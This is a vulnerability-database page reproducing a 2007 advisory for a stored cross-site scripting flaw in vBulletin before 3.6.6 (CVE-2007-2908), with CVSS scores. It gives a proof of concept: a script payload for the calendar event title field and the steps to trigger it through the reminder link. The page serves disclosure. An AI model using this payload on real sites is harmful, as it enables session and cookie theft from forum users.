Bug: vbulletin < 3.6.6 [permanent xss] ( Ascii Version )
Search:
WLB2

CVE WLB2

WLB2.ORG
Full List
Bugs
Bogus
Tricks
Exploits
CVEMAP.ORG
Full List
Vendors
Products
Tools
CWE Dictionary
Dorks List
cIFrex
Search
Bugtraq
CVEMAP
CVE Id
CWE Id
RSS
Full List
Bugs
Exploits
Dorks
Information
Add note
About
Submit

To add a note,

use this form

or send email to

submit@cxsec.org
Social

TwitterFacebook
vbulletin < 3.6.6 [permanent xss]

Published
Credit
Risk
2007.06.03
laurent gaffie
Low
CWE
CVE
Local
Remote
N/A
CVE-2007-2908
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

vendor site:http://www.vbulletin.com/
product:vbulletin < 3.6.6
bug: permanent xss
affected file: calendar.php
risk : medium

xss permanent ( must be loggued ) PoC :
http://127.0.0.1/vbulletin/calendar.php?do=add&type=single&c=1
--> fill up the title field with :
</title><script>alert(document.cookie)</script>

Event Date : ( some far away date ... like 2010 for exemple )
message : whatever .

when it's done look at the :"Request Reminder for this Event" link.
(it looks like this: http://127.0.0.1/vbulletin/calendar.php?do=addreminder&e=2)
if you click,your XSS will be executed .

reminder:
permanent xss are dangerous ...
see : http://en.wikipedia.org/wiki/Cross_site_scripting

regards laurent gaffié
contact: laurent.gaffie[at]g/**/m/**/a/**/i/**/l.com

ASCII VERSION
Copyright 2013, cxsecurity.com
 Ascii Version